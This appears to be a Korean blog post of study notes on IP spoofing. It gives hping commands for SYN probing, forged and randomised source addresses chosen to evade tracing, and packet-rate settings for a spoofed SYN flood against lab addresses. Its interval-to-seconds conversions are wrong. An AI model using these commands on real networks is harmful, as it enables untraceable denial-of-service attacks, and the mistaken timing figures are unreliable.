Internet Layer ( ICMP/IGMP, IP(IPv4/IPv6), ARP/RARP)
IP Spoofing
IP spoofing 기술
- DoS(DDoS), smarf Attack 등의 공격 시 공격자 정보를 감추기 위한 수단.
- 주로 데이터를 송신하는 형태의 공격에서 많이 사용됨.
- 공격 목표는 인터넷 구간에 존재하는 경우 효과적임.
- 공격 도구 : netbot Attacker, hping, PC-RAT
# hping [-options] IP_address : TCP를 이용한 ping 명령
# hping 192.168.3.xx
# hping -S 192.168.3.xx : TCP syn 패킷을 이용한 ping
# hping -S -p 22 192.168.3.xx : 특정 포트 서비스 확인
# hping -1 192.168.3.xx : ICMP 프로토콜을 이용한 ping
# hping -2 192.168.3.xx : UDP 프로토콜을 이용한 ping
# hping -2 -p 22 192.168.3.xx : 특정 포트 서비스 확인
# type hping
# type hping3
현재 이건 공격이 아님. 너무 느림 옵션을 붙여야 공격이 됨!!
smarf attack
LAND ATTack - cpu 중 i 가 들어간 것은 잘 안당한다. 그 전버전에 이용
Dos를 사용할 때, 핵심은 IP를 속여라!!!
<spoofing>
속일_IP 공격_IP
# hping -S -p 21 -a 192.168.3.X 192.168.3.XX : -a로 내 IP를 속일 수 있음 (타겟2명)
# hping -S -p 21 192.168.3.XX --rand-source : 1개 특정IP만 사용하면 추적올 수 있으니 임의IP로 찍으며 보냄. (타겟1명)
# hping -a 192.168.3.X 192.168.3.XX -S -p 21 -i u100 : 보내는 속도 조절 0.01초
# hping -a 192.168.3.X 192.168.3.XX -S -p 21 -i u1000 : 보내는 속도 조절 0.001초 **
# hping -a 192.168.3.X 192.168.3.XX -S -p 21 -i u10000 : 보내는 속도 조절 0.0001초
이정도는 되어야 DoS 공격이라고 할 수 있음
'Learning > └◆Network Hacking' 카테고리의 다른 글
| Transport Layer TCP Syn Flooding [TCP/IP Model] (0) | 2016.12.06 |
|---|---|
| Internet Layer hping3 CMD [TCP/IP Model] (0) | 2016.12.06 |
| Internet Layer ARP Spoofing [TCP/IP Model] (0) | 2016.12.06 |
| 네트워크 패킷 분석 - TCP/UDP (0) | 2016.12.06 |
